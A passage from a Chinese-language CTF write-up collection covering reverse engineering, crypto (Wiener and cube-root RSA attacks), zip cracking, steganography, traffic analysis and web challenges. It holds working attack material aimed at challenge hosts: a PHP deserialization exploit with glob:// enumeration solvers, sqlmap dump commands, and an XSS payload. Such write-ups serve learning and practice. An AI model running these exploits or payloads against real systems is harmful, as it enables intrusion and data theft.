14002a00c 00 ?? 00h
14002a00d 00 ?? 00h
14002a00e 00 ?? 00h
14002a00f 00 ?? 00h
14002a010 01 ?? 01h
14002a011 00 ?? 00h
14002a012 00 ?? 00h
14002a013 00 ?? 00h
14002a014 01 ?? 01h
14002a015 00 ?? 00h
14002a016 00 ?? 00h
14002a017 00 ?? 00h
14002a018 00 ?? 00h
14002a019 00 ?? 00h
14002a01a 00 ?? 00h
14002a01b 00 ?? 00h
14002a01c 01 ?? 01h
14002a01d 00 ?? 00h
14002a01e 00 ?? 00h
14002a01f 00 ?? 00h
14002a020 00 ?? 00h
14002a021 00 ?? 00h
14002a022 00 ?? 00h
14002a023 00 ?? 00h
14002a024 01 ?? 01h
14002a025 00 ?? 00h
14002a026 00 ?? 00h
14002a027 00 ?? 00h
14002a028 01 ?? 01h
14002a029 00 ?? 00h
14002a02a 00 ?? 00h
14002a02b 00 ?? 00h
14002a02c 00 ?? 00h
14002a02d 00 ?? 00h
14002a02e 00 ?? 00h
14002a02f 00 ?? 00h
14002a030 01 ?? 01h
14002a031 00 ?? 00h
14002a032 00 ?? 00h
14002a033 00 ?? 00h
14002a034 00 ?? 00h
14002a035 00 ?? 00h
14002a036 00 ?? 00h
14002a037 00 ?? 00h
14002a038 01 ?? 01h
14002a039 00 ?? 00h
14002a03a 00 ?? 00h
14002a03b 00 ?? 00h
14002a03c 01 ?? 01h
14002a03d 00 ?? 00h
14002a03e 00 ?? 00h
14002a03f 00 ?? 00h
14002a040 00 ?? 00h
14002a041 00 ?? 00h
14002a042 00 ?? 00h
14002a043 00 ?? 00h
14002a044 00 ?? 00h
14002a045 00 ?? 00h
14002a046 00 ?? 00h
14002a047 00 ?? 00h
14002a048 00 ?? 00h
14002a049 00 ?? 00h
14002a04a 00 ?? 00h
14002a04b 00 ?? 00h
14002a04c 01 ?? 01h
14002a04d 00 ?? 00h
14002a04e 00 ?? 00h
14002a04f 00 ?? 00h
14002a050 01 ?? 01h
14002a051 00 ?? 00h
14002a052 00 ?? 00h
14002a053 00 ?? 00h
14002a054 01 ?? 01h
14002a055 00 ?? 00h
14002a056 00 ?? 00h
14002a057 00 ?? 00h
14002a058 01 ?? 01h
14002a059 00 ?? 00h
14002a05a 00 ?? 00h
14002a05b 00 ?? 00h
14002a05c 01 ?? 01h
14002a05d 00 ?? 00h
14002a05e 00 ?? 00h
14002a05f 00 ?? 00h
14002a060 01 ?? 01h
14002a061 00 ?? 00h
14002a062 00 ?? 00h
14002a063 00 ?? 00h
</code></pre>
<p>由于提示迷宫为5*5把上面的数据每五个一组得到下面的数据</p>
<pre><code>1000 0000 1000 0000 1000
1000 0000 1000 0000 1000
1000 0000 1000 0000 1000
1000 0000 0000 0000 1000
1000 1000 1000 1000 1000
</code></pre>
<p>在伪代码 sub_140001130()函数发现了
<img src="../../img_list/image20230608145330026.png" alt="image-20230608145330026" />
把后面的零去掉得到</p>
<pre><code>1 0 1 0 1 #左上0是迷宫入口,右上0是迷宫出口
1 0 1 0 1
1 0 1 0 1
1 0 0 0 1
1 1 1 1 1
# “ ! space
上 下 左 右
得到
"""spacespace### =&gt;""" ###
</code></pre>
<p>ghidra 看strings发现flag是迷宫的md5值
<img src="../../img_list/image20230606165635939.png" alt="image-20230606165635939" />
得到
<img src="../../img_list/image20230606170144258.png" alt="image-20230606170144258" />
flag{c4eb11b0e0a3cbeed7df057deaec18aa}</p>
<h2 id="just-serialize"><a class="header" href="#just-serialize">just serialize</a></h2>
<p>task.php</p>
<pre><code class="language-php">&lt;?php
show_source(__FILE__);
// Challenge class: holds a path and, when converted to a string, reports
// whether scandir() returned any entries for it.
// NOTE(review): $filename is public and is passed to scandir() as is, so when
// the object is created by unserialize() the requester picks the path,
// including any stream-wrapper prefix. unserialize() does not run
// __construct(), so the constructor is no place to validate it.
class Secret
{
public $filename;
public function __construct($filename)
{
$this-&gt;filename = $filename;
}
// Returns '什么也没有' when scandir() yields at least one entry and 'flag_'
// when it yields none. The two answers differ, so whoever can see the output
// learns whether the supplied path or pattern matched something.
// NOTE(review): scandir() can also return false on failure; what count() does
// with that depends on the PHP version - confirm before reusing this pattern.
public function __toString()
{
$num = count(scandir($this-&gt;filename));
if ($num &gt; 0) {
return '什么也没有';
} else {
return 'flag_';
}
}
}
// Challenge class: prints its $text property when the object is destroyed.
// NOTE(review): echo converts a non-string value to a string, so if $text
// holds an object its __toString() runs here. Because the destructor fires for
// any Read instance, including one created by unserialize(), this method is
// the entry point that turns deserialized data into executed code paths.
class Read
{
public $text = '什么东西';
public function __destruct()
{
echo $this-&gt;text;
}
}
// Deserializes the raw `p` query parameter. unserialize() creates objects of
// any class defined above with properties chosen by the requester, and their
// magic methods run afterwards; that is the flaw this challenge is built on.
// In real code, exchange plain data instead (for example JSON via
// json_decode), or call unserialize() with the allowed_classes option set to
// false so that no objects are instantiated.
$a = unserialize($_GET['p']);
</code></pre>
<p>payload.php</p>
<pre><code class="language-php">&lt;?php
class Secret
{
public $filename;
}
class Read
{
public $text;
}
$a = new Read();
$b = new Secret();
$b-&gt;filename = "glob://flag_xxskxnsknxakbsx.txt.*";
$a-&gt;text =$b;
echo "\n";
echo serialize($a);
// O:4:"Read":1:{s:4:"text";O:6:"Secret":1:{s:8:"filename";s:33:"glob://flag_xxskxnsknxakbsx.txt.*";}}
?&gt;
</code></pre>
<p>exp.py</p>
<pre><code class="language-python">import requests
import string
from urllib.parse import quote
# Solver for the local copy of task.php (127.0.0.1:7777). It grows a glob://
# pattern one character at a time and uses the page's two possible answers to
# tell whether the pattern still matches a file.
# Defender's view: the traffic is a long run of GET requests whose `p`
# parameter carries a PHP serialized object with a glob:// path - easy to
# alert on in web-server or WAF logs.
# pwd is assigned but not used below.
pwd = string.ascii_lowercase + string.digits
# Candidate characters tried at each position.
S = 'abcdefghijklmnopqrstuvwxyz0123456789.'
url = "http://127.0.0.1:7777/task.php"
# Serialized Read object wrapping a Secret; the two {} slots take the byte
# length of the filename and the filename itself (doubled braces are literal).
payload = '?p=O:4:"Read":1:{{s:4:"text";O:6:"Secret":1:{{s:8:"filename";s:{}:"{}";}}}}'
url += payload
if __name__ == "__main__":
flag = 'glob://flag_'
# NOTE(review): if no character in S is accepted, flag stops growing and the
# loop condition never changes.
while len(flag)&lt;40:
for i in S:
tmp = flag + i + '*'
# No timeout is passed, so a stalled server blocks the script.
r = requests.get(url.format(len(tmp), tmp))
# A response whose last 50 characters lack 'flag_' is treated as a match.
if 'flag_' not in r.text[-50:]:
flag += i
break
print(flag)
</code></pre>
<p>exp.rs</p>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>use crate::http;
/// Rust version of the solver for the local task.php (127.0.0.1:7777): grows a
/// glob:// pattern one character at a time, keeping a character when the
/// response does not end with "flag_", and prints the pattern after each pass.
///
/// `http::get` comes from this crate; only field `.1` of its result is read
/// here, presumably the response body.
/// NOTE(review): if no character in `alphabet` is accepted, `flag` stops
/// growing and the loop condition never changes.
/// Defender's view: the traffic is a long run of GET requests whose `p`
/// parameter carries a PHP serialized object with a glob:// path.
pub fn just_serialize(){
let alphabet = "abcdefghijklmnopqrstuvwxyz0123456789.";
let url = "http://127.0.0.1:7777/task.php";
let mut flag = "glob://flag_".to_string();
while flag.len() &lt; 50 {
for i in alphabet.chars(){
let temp = format!("{}{}*",flag,i);
// Doubled braces are literal; the last two slots take the byte length of the
// pattern and the pattern itself.
let url = format!("{}?p=O:4:\"Read\":1:{{s:4:\"text\";O:6:\"Secret\":1:{{s:8:\"filename\";s:{}:\"{}\";}}}}",url,temp.len(),temp);
// expect("") panics with an empty message if the request fails.
let r = http::get(&amp;url).expect("");
if !r.1.ends_with("flag_") {
flag.push(i);
break;
}
}
println!("{}",flag);
}
}
<span class="boring">}</span></code></pre></pre>
<h2 id="流量分析实战"><a class="header" href="#流量分析实战">流量分析实战</a></h2>
<p>filter http 发现 有两个可疑文件
<img src="../../img_list/image20230608170605207.png" alt="image-20230608170605207" />
<img src="../../img_list/image20230608170545618.png" alt="image-20230608170545618" />
导出这两个php
<img src="../../img_list/image20230608171015744.png" alt="image-20230608171015744" />
<img src="../../img_list/image20230608171049710.png" alt="image-20230608171049710" /></p>
<p><img src="../../img_list/image20230608171116488.png" alt="image-20230608171116488" /></p>
<p>复制粘贴到01editor 保存为demo.zip
<img src="../../img_list/image20230609122944950.png" alt="image-20230609122944950" />
破解得到密码为hackerme8888 解压得到flag.txt
flag{2c094ea0-088c-440e-b6da-472e1bec6239}</p>
<h2 id="spiral-螺旋矩阵"><a class="header" href="#spiral-螺旋矩阵">spiral 螺旋矩阵</a></h2>
<p>已知图片spiral.png
<img src="../../img_list/spiral.png" alt="spiral" />
<img src="../../img_list/image20230609154832720.png" alt="image-20230609154832720" />
解密base64得到
flag{fake_flag} But RGBA色彩空间缺一不可哦~ 我教你还原:aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0dXX3dnL2FydGljbGUvZGV0YWlscy8xMjA0MDYxOTI=</p>
<pre><code>echo aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0dXX3dnL2FydGljbGUvZGV0YWlscy8xMjA0MDYxOTI= | base64 -d
</code></pre>
<p>https://blog.csdn.net/GW_wg/article/details/120406192
根据图片得到了图片加密的代码task.py</p>
<pre><code class="language-python">def function(n):
# Build an n x n matrix holding 1..n*n laid out as a clockwise spiral that starts at the top-left corner.
# Each pass of the while loop fills one ring, then the bounds move one cell inwards.
matrix = [[0] * n for _ in range(n)]
number = 1
left, right, up, down = 0, n - 1, 0, n - 1
while left &lt; right and up &lt; down:
# left to right along the top edge (last cell of the edge is left for the next loop)
for i in range(left, right):
matrix[up][i] = number
number += 1
# top to bottom along the right edge
for i in range(up, down):
matrix[i][right] = number
number += 1
# right to left along the bottom edge
for i in range(right, left, -1):
matrix[down][i] = number
number += 1
# bottom to top along the left edge
for i in range(down, up, -1):
matrix[i][left] = number
number += 1
left += 1
right -= 1
up += 1
down -= 1
# when n is odd, the single cell in the centre is not covered by any ring and is filled separately
if n % 2 != 0:
matrix[n // 2][n // 2] = number
return matrix
</code></pre>
<p>写出下面的代码exp.py</p>
<pre><code class="language-python">from PIL import Image
def spiral_order(matrix):
    """Return the elements of a 2-D list read in clockwise spiral order.

    Reading starts at the top-left corner and works inwards ring by ring.
    The input is consumed: rows are popped from ``matrix`` and elements are
    popped from its rows, so the caller's list is empty afterwards.

    :param matrix: list of row lists (may be empty or None)
    :return: flat list of the elements in spiral order
    """
    out = []
    while matrix:
        # top row, left to right
        out += matrix.pop(0)
        # right column, top to bottom
        if matrix and matrix[0]:
            out += [row.pop() for row in matrix]
        # bottom row, right to left
        if matrix:
            out += reversed(matrix.pop())
        # left column, bottom to top
        if matrix and matrix[0]:
            out += [row.pop(0) for row in reversed(matrix)]
    return out
def reconstruct_image(image_path):
    """Re-order the pixels of an image by reading them in spiral order and display the result.

    The image is converted to RGBA, split into rows, passed through
    spiral_order(), and the resulting pixel sequence is written row by row
    into a new RGBA image of the same size, which is then shown.

    :param image_path: path of the image file to open
    """
    source = Image.open(image_path)
    width, height = source.size
    # RGBA keeps the alpha channel, which the later analysis step inspects
    pixels = list(source.convert("RGBA").getdata())
    # one list per image row, so spiral_order() can walk it as a matrix
    rows = []
    for y in range(height):
        rows.append(pixels[y * width:(y + 1) * width])
    restored = Image.new("RGBA", (width, height))
    restored.putdata(spiral_order(rows))
    restored.show()
    # restored.save("new.png")  # enable to write the file instead of only displaying it
# 示例用法
reconstruct_image("spiral.png")
</code></pre>
<p>把代码形成的new.png 用stegsolve打开
<img src="../../img_list/image20230609155622535.png" alt="image-20230609155622535" />
在alpha通道得到了密码mUv8vvGRMNK5mgbxPNsH
用密码解压得到flag
<img src="../../img_list/image20230609160056361.png" alt="image-20230609160056361" /></p>
<h1 id="ichunqiuctf"><a class="header" href="#ichunqiuctf">IchunqiuCTF</a></h1>
<h2 id="quoted-printable"><a class="header" href="#quoted-printable">Quoted-printable</a></h2>
<pre><code>1.unzip file and open .txt copy text code
2.use quoted_printable_cli -d text to decode
flag{那你也很棒哦}
</code></pre>
<h2 id="zero_one"><a class="header" href="#zero_one">zero_one</a></h2>
<pre><code>ctf-party "01001100011010010011000" from_bin
</code></pre>
<h2 id="rsa"><a class="header" href="#rsa">RSA</a></h2>
<pre><code>1.use rsa.py get d
</code></pre>
<h3 id="wieners-rsa-attack"><a class="header" href="#wieners-rsa-attack">Wieners RSA Attack</a></h3>
<pre><code class="language-python">import gmpy2
import libnum
def continuedFra(x, y):
    """Compute the continued-fraction expansion of x / y.

    :param x: numerator
    :param y: denominator
    :return: list of partial quotients [a0, a1, ...]; empty when y is 0
    """
    quotients = []
    while y != 0:
        whole, rest = divmod(x, y)
        quotients.append(whole)
        x, y = y, rest
    return quotients
def gradualFra(cf):
    """Evaluate a continued fraction and return its value as a pair of integers.

    The pair is ordered (denominator, numerator): for partial quotients that
    expand to the fraction a / b, the result is (b, a). Callers that unpack
    the pair must keep that order in mind.

    :param cf: list of partial quotients
    :return: (denominator, numerator) of the fraction the whole list represents
    """
    prev, cur = 0, 1
    # fold from the innermost term outwards
    for quotient in reversed(cf):
        prev, cur = cur, quotient * cur + prev
    return prev, cur
def solve_pq(a, b, c):
    """Return the two integer roots of a*x^2 + b*x + c = 0 (Vieta's relations for p and q).

    The square root is taken with gmpy2.isqrt, i.e. rounded down, and the
    divisions are floor divisions, so the result is exact only when the
    discriminant is a perfect square; the caller verifies the roots by
    multiplying them back.

    :param a: coefficient of x^2
    :param b: coefficient of x
    :param c: constant term (p*q)
    :return: tuple of the two candidate roots
    """
    root = gmpy2.isqrt(b * b - 4 * a * c)
    two_a = 2 * a
    return (-b + root) // two_a, (-b - root) // two_a
def getGradualFra(cf):
    """Return every convergent of a continued fraction.

    :param cf: list of partial quotients
    :return: list with one gradualFra() result per prefix cf[:1], cf[:2], ..., cf
    """
    return [gradualFra(cf[:end]) for end in range(1, len(cf) + 1)]
def wienerAttack(e, n):
    """Recover an RSA private exponent from the public key when that exponent is small.

    Each convergent of e / n is tried as a candidate k / d. A candidate is
    accepted when (e*d - 1) / k is an integer phi for which the quadratic
    with sum n - phi + 1 and product n has roots that multiply back to n.
    The method only succeeds for keys whose d is small relative to n
    (Wiener's bound, roughly d below n^(1/4) / 3); keys generated with a
    standard small e and a full-size d are not affected.

    :param e: public exponent
    :param n: modulus
    :return: private exponent d, or None when no convergent fits
    """
    for d, k in getGradualFra(continuedFra(e, n)):
        # k == 0 is the leading convergent when e is smaller than n; skip it before dividing
        if k == 0 or (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        p, q = solve_pq(1, n - phi + 1, n)
        if p * q == n:
            return d
n= 68781015120012754009149819243839432182753699533745468739333557116438115901358573880902197723852823949505376140916570536753019491036629572363854637530919546688901226752085109196549145599781909847664046508960094447692268230516763088293911965638780888720788954194778424857089535187609738198309161969913567107861
e= 54093680529782962282616750547542407544796590039913570980901028264103594185617926725669901283009540557359666956131385125727959502505561517117179644650419753631214251337533961664493198676862110639584202010794500844074619335752668896589407110076134931918634061631574656816488381501901503924226166074238518619869
c= 30443384983816710270001651296607959522389400057103143909277631290995899073895621701281106228069835965181342091582584186637031613250922961166298411359757600825556083868477673357860585539016515776933117915504873987178857740106223631465737111746470236003857656528610755145017342412306680097140732745012583119076
d=wienerAttack(e, n)
m=pow(c, d, n)
print(libnum.n2s(m).decode())
</code></pre>
<h2 id="windows系统密码"><a class="header" href="#windows系统密码">Windows系统密码</a></h2>
<pre><code>1. open https://www.bejson.com/enc/md5dsc/ decode MD5
2.can get good-luck
</code></pre>
<h2 id="二维码"><a class="header" href="#二维码">二维码</a></h2>
<pre><code>1. cat qr_code.png 发现了4number.txt还有一些PK值敏感想到可能隐藏了一个zip压缩包(zip的创始人名字简写为PK)和4number.txt文件
2. binwalk qr_code.png 结果如下,检测出图片中存在压缩包
3. foremost qr_code.png 分离压缩包 进入output 文件夹 有加密的 00000000.zip
4. fcrackzip -b -c 1 -l 4-4 -u 00000000.zip 找到密码为7639 打开.txt 有flag
flag{vjpw_wnoei}
1. hexdump -C qr_code.png
2. binwalk -e qr_code.png 分离压缩包
3. cd qr_code.png.extrackted
4. zip2john 1d7.zip &gt;&gt; hash
5. john hash --show
flag{vjpw_wnoei}
</code></pre>
<pre><code># 隐藏
# hidden.txt是要隐藏的文件, demo.jpg是用来隐藏信息的图片, out.jpg是有隐藏信息的图片
outguess -k "my secret key" -d hidden.txt demo.jpg out.jpg
# 提取
outguess -k "my secret key" -r out.jpg hidden.txt
# 隐藏数据 To embed emb.txt in cvr.jpg
steghide embed -cf cvr.jpg -ef emb.txt
# 提取数据 To extract embedded data from stg.jpg
steghide extract -sf stg.jpg
</code></pre>
<h2 id="stxxhxxx"><a class="header" href="#stxxhxxx">stxxhxxx</a></h2>
<pre><code>flag:ctf{welcom_to_upc_im}
1. steghide extract -sf stxxhxxx.jpeg
2. cat info
</code></pre>
<h2 id="rar"><a class="header" href="#rar">rar</a></h2>
<pre><code>use rust buuctf::solutions::fcreack_rar().await; to force crack password
</code></pre>
<h2 id="dangerous-rsa"><a class="header" href="#dangerous-rsa">Dangerous RSA</a></h2>
<pre><code class="language-python">def Dangerous_RSA():
# Recovers m from c = m^e mod n with e = 3 by testing c + k*n for k = 0, 1, 2, ... until the value is a perfect cube.
# The search ends quickly only when m^3 is not much larger than n, i.e. for a short message encrypted without padding;
# randomized padding such as OAEP removes that condition.
# NOTE(review): iroot and libnum are not imported in this listing; presumably gmpy2.iroot and the libnum package, confirm.
e = 0x3
n = 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
c = 0x10652cdfaa6b63f6d7bd1109da08181e500e5643f5b240a9024bfa84d5f2cac9310562978347bb232d63e7289283871efab83d84ff5a7b64a94a79d34cfbd4ef121723ba1f663e514f83f6f01492b4e13e1bb4296d96ea5a353d3bf2edd2f449c03c4a3e995237985a596908adc741f32365
k = 0
while 1:
res = iroot(c+k*n,e) # integer e-th root of c + k*n; res[1] tells whether the root is exact
#print(res)
#res = (mpz(13040004482819713819817340524563023159919305047824600478799740488797710355579494486728991357), True)
if(res[1] == True):
print(libnum.n2s(int(res[0]))) # convert the integer back to a byte string
break
k=k+1
Dangerous_RSA()
</code></pre>
<h2 id="rsa-flagenc-pubkey"><a class="header" href="#rsa-flagenc-pubkey">RSA flag.enc pub.key</a></h2>
<pre><code class="language-bash">1. openssl rsa -pubin -in pub.key -text -modulus
2. convert to decimal n = int("C0332C5C64AE47182F6C1C876D42336910545A58F7EEFEFC0BCAAF5AF341CCDD",16)
3. factordb 86934482296048119190666062003494800588905656017203025617216654058378322103517
4. p = 285960468890451637935629440372639283459
5. q = 304008741604601924494328155975272418463
6. e = 65537
import gmpy2
import rsa
n = int("C0332C5C64AE47182F6C1C876D42336910545A58F7EEFEFC0BCAAF5AF341CCDD",16)
p = 285960468890451637935629440372639283459
q = 304008741604601924494328155975272418463
e = 65537
phin = (q-1)*(p-1)
d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
with open("./flag.enc", "rb+") as f:
f = f.read()
print(rsa.decrypt(f, key))
flag{decrypt_256}
</code></pre>
<h2 id="这个压缩包有点麻烦"><a class="header" href="#这个压缩包有点麻烦">这个压缩包有点麻烦</a></h2>
<pre><code class="language-sh">fcrackzip -b -c 1 -l 6-6 -u attachment.zip =&gt;483279
open windows crack by password-note.txt and 解压flag.zip
bkcrack -C flag.zip -c README.txt -p README.txt
bkcrack -C flag.zip -c flag.jpg -k 060fd5e1 d1f696b7 12655d8d -d flag =&gt;生产flag图片
binwalk flag =&gt;发现有zip
binwalk -e flag =&gt;提出4FC5.zip
imhex 4FC5.zip =&gt;用imhex清除伪密码 14 00 09 改为14 00 00
unzip 4FC5.zip =&gt;可以看到flag
</code></pre>
<h2 id="lsbhacking"><a class="header" href="#lsbhacking">lsbHacking</a></h2>
<pre><code class="language-sh">#solution1
java -jar Stegsolve.jar
open image
data analis
select 0
and save bin flag.png
open CaptfEncoder-ubuntu-20-x64-3.1.2.bin
decode qrcode
#solution2
zsteg flag11.png
zsteg flag11.png -E b1,rgb,lsb,xy &gt; flag1.png
open CaptfEncoder-ubuntu-20-x64-3.1.2.bin
decode qrcode
</code></pre>
<h2 id="眼见非实"><a class="header" href="#眼见非实">眼见非实</a></h2>
<pre><code class="language-sh">mv zip z.zip
unzip z.zip
binwalk -e 眼见非实.docx
mv 眼见非实.docx yan.zip
unzip yan.zip
open extreated folder with code search flag
</code></pre>
<h2 id="t0p_gear"><a class="header" href="#t0p_gear">T0p_Gear</a></h2>
<pre><code class="language-sh">https://www.cnblogs.com/ms-study/p/13201030.html
</code></pre>
<p>#@ add user for archlinux WSL and login</p>
<pre><code class="language-sh">wsl.exe -d Arch login
user_name:andrew
password:dnr..
# open /etc/sudoers add that
nano /etc/sudoers
andrew ALL=(ALL) ALL
</code></pre>
<h2 id="use-steghide"><a class="header" href="#use-steghide">use steghide</a></h2>
<pre><code>#显示信息
steghide info demo.png
zsteg -a demo.png
</code></pre>
<h2 id="这是类"><a class="header" href="#这是类">这是类</a></h2>
<pre><code class="language-python"># strings AppletMain.class
s = "\u0066\u006c\u0061\u0067\u007b\u0033\u0034\u0038\u0034\u0066\u0038\u0033\u0061\u002d\u0066\u0062\u0035\u0033\u002d\u0034\u0062\u0038\u0031\u002d\u0061\u0033\u0061\u0037\u002d\u0064\u0038\u0062\u0064\u0031\u0039\u0032\u0036\u0036\u0062\u0062\u0033\u007d"
decoded_s = bytes(s, "utf-8").decode("unicode_escape")
print(decoded_s)
# flag{3484f83a-fb53-4b81-a3a7-d8bd19266bb3}
</code></pre>
<h2 id="我藏起来了"><a class="header" href="#我藏起来了">我藏起来了</a></h2>
<pre><code class="language-bash">css_remove_display_none
zsteg im.png
flag{72a8c48e-5bb0-40ef-b3f0-5543c3b16dfd}
</code></pre>
<h2 id="gif提取隐藏信息"><a class="header" href="#gif提取隐藏信息">gif提取隐藏信息</a></h2>
<pre><code class="language-sh">convert new_gif.gif -coalesce xx_%05d.png
一个一个看形成的图片能够得到flag
</code></pre>
<h2 id="棋盘密码上古神器"><a class="header" href="#棋盘密码上古神器">棋盘密码,上古神器</a></h2>
<pre><code class="language-bash">“波利比奥斯棋盘”
“3534315412244543_434145114215_132435231542”
</code></pre>
<p>https://www.qqxiuzi.cn/bianma/qipanmima.php</p>
<h2 id="flow_analysis"><a class="header" href="#flow_analysis">flow_analysis</a></h2>
<pre><code class="language-sh">#convert pcapng to pcap
tshark -F pcap -r ctf.pcapng -w newfile.pcap
</code></pre>
<p>getsqlinjection.py</p>
<pre><code class="language-python">import urllib
import pyshark
# Capture to analyse, restricted by the display filter to HTTP traffic involving the two listed addresses.
cap_file = '/run/media/andrew/HIKVISION/CTF/ichunqiu_ctf/flow_analysis/ctf.pcapng'
cap = pyshark.FileCapture(cap_file, display_filter='http &amp;&amp; ip.addr == 192.168.61.140 &amp;&amp; ip.addr == 192.168.61.1')
# Sentinel returned by getattr() below when a packet's HTTP layer has no 'time' field.
is_http_request = 'is_http_request'
http_request = []
blind_attack_success = []
# The list comprehension walks the whole capture once just to learn the packet count before indexing into it.
for i in range(len([_ for _ in cap])):
check = getattr(cap[i].http, 'time', is_http_request)
if check != is_http_request:
# http.time is the response's time since its request. A response slower than 3 seconds is presumably
# a time-based blind SQL injection probe whose tested condition was true.
if float(cap[i].http.time) &gt; 3:
# Walk backwards to the request frame this response answers (http.request_in).
# NOTE(review): range(i, 0, -1) stops before index 0, so a matching request in the first packet would be missed.
for j in range(i, 0, -1):
if cap[j].frame_info.number == cap[i].http.request_in:
http_request.append((cap[j].frame_info.number, cap[j]))
http_request.append((cap[i].frame_info.number, cap[i]))
# NOTE(review): relies on urllib.parse being loaded; the listing imports only urllib, and "import urllib.parse" is the explicit form.
blind_attack_success.append(urllib.parse.unquote(cap[j].http.file_data))
print(cap[j].frame_info.number)
print(cap[j])
print(urllib.parse.unquote(cap[j].http.file_data))
# input()
print("----")
print(cap[i].frame_info.number)
print(cap[i])
print("----"*3)
break
# One URL-decoded request body per delayed response, in capture order.
with open('output.txt', 'w') as f:
f.writelines('\n'.join(blind_attack_success))
</code></pre>
<p>getasciicode.py</p>
<pre><code>file_path = 'output.txt'
with open(file_path, 'r') as f:
lines = f.readlines()
ascii_digits = [ _.split('=')[2].split(',')[0] for _ in lines]
ascii_letters = ''.join([chr(int(_)) for _ in ascii_digits])
print(ascii_letters)
</code></pre>
<h2 id="new-swan-stone-castle"><a class="header" href="#new-swan-stone-castle">New Swan Stone Castle</a></h2>
<pre><code class="language-bash">sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23"
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" --current-db
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 --tables
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 -T password --columns
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 -T password -C id --dump
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 -T password -C pwd --dump
</code></pre>
<h2 id="万国码"><a class="header" href="#万国码">万国码</a></h2>
<pre><code class="language-bash">file:///usr/share/webapps/cyberchef/index.html#recipe=Unescape_Unicode_Characters('%5C%5Cu')
decode unicode "\u0049\u0063\u0068\u0075\u006e\u0071\u0069\u0075\u007a\u006e\u007a\u006c"
enter value get flag
</code></pre>
<h2 id="考考小李"><a class="header" href="#考考小李">考考小李</a></h2>
<pre><code class="language-bash">'&gt;&lt;script&gt;alert(xx)&lt;/script&gt;
把上面的提交能够得到flag
flag{608837f4-bbc5-464c-99ab-7b44016d1ee9}
</code></pre>
<h2 id="回旋13踢"><a class="header" href="#回旋13踢">回旋13踢</a></h2>
<pre><code class="language-bash">xw4n73qm23z rot13
enter value get flag
</code></pre>
<h2 id="隐藏的编码"><a class="header" href="#隐藏的编码">隐藏的编码</a></h2>
<pre><code class="language-bash">adslkjadsl a ,zmxnc,zmc,zxcopaweqwk;l;l;l;l;l;l;l;l;l;l;l;ldkm,ZGY1czRh==.zxmczxkchzxkhiqewupipsad;l;l;l;l;l;l;l;l;l;l;l;l
base64 -d ZGY1czRh==
enter value get flag
</code></pre>
<h2 id="致敬经典"><a class="header" href="#致敬经典">致敬经典</a></h2>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>//看图片应该是凯撒加密 分析秘钥发现有偏移6ASCII code 为偶数时右偏移6奇数时左偏移6
fn caesar_cipher_decode_uniqe(text: &amp;str, shift: u32) -&gt; String {
println!("{}",text);
let mut result = String::new();
for c in text.chars() {
match c {
'a'..='z' =&gt; {
let mut ascii_code = c as u8;
if ascii_code %2 !=0{
ascii_code+=6;
}else{
ascii_code-=6;
}
if ascii_code&gt;'z' as u8{
ascii_code = ascii_code - ('z' as u8)+('a' as u8)-1;
}
result.push((ascii_code) as char);
}
'A'..='Z' =&gt; {
let mut ascii_code = c as u8;
if ascii_code %2 !=0{
ascii_code+=6;
}else{
ascii_code-=6;
}
if ascii_code&gt;'Z' as u8{
ascii_code = ascii_code - ('Z' as u8)+('A' as u8)-1;
}
result.push((ascii_code) as char);
}
_ =&gt; result.push(c),
}
}
println!("{}",result);
result
}
caesar_cipher_decode_uniqe("lrua{1uy3yj9l-yw9u-48j2-uuj8-36h03706y7u7}",6);
<span class="boring">}</span></code></pre></pre>
<h2 id="xor-签到题"><a class="header" href="#xor-签到题">xor 签到题</a></h2>
<pre><pre class="playground"><code class="language-rust">fn main() {
let file = include_bytes!("xor GAME.txt").to_vec();
let key = "GAME".as_bytes().iter().map(|s|s.to_owned()).collect::&lt;Vec&lt;u8&gt;&gt;();
let new_file = xor(file,key);
println!("{}",String::from_utf8_lossy(&amp;new_file));
}
fn xor(vec:Vec&lt;u8&gt;,key:Vec&lt;u8&gt;)-&gt;Vec&lt;u8&gt;{
let mut new_file = vec![];
for f in 0..vec.len(){
let ff= vec.get(f).unwrap()^key.get(f%key.len()).unwrap();
new_file.push(ff);
}
new_file
}</code></pre></pre>
<pre><code class="language-python">with open("xor GAME.txt","r") as f:
bytes = f.read()
game = "GAME"
flag = []
for i in range(len(bytes)):
new_b = ord(str(bytes[i]).encode('utf-8')) ^ ord(game[i%len(game)].encode('utf-8'))
flag.append(chr(new_b))
print("".join(flag))
</code></pre>
<h2 id="crymisc"><a class="header" href="#crymisc">CryMisc</a></h2>
<pre><code class="language-python">import pyminizip
pyminizip.compress(r"jiami.py","",r"jiami.zip","",0)
#用AZPR明文破解
AESencrypt.py 可以得到
n = int("48D6B5DAB6617F21B39AB2F7B14969A7337247CABB417B900AE1D986DB47D971",16)=32945885482421841602167475970472000545315534895409154025267147105384142461297
factordb 32945885482421841602167475970472000545315534895409154025267147105384142461297
import gmpy2
import rsa
n = 32945885482421841602167475970472000545315534895409154025267147105384142461297
p = 177334994338425644535647498913444186659
q = 185783328357334813222812664416930395483
e = 65537
phin = (q-1)*(p-1)
d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
with open("./message.encrypted", "rb+") as f:
f = f.read()
print(rsa.decrypt(f, key))
</code></pre>
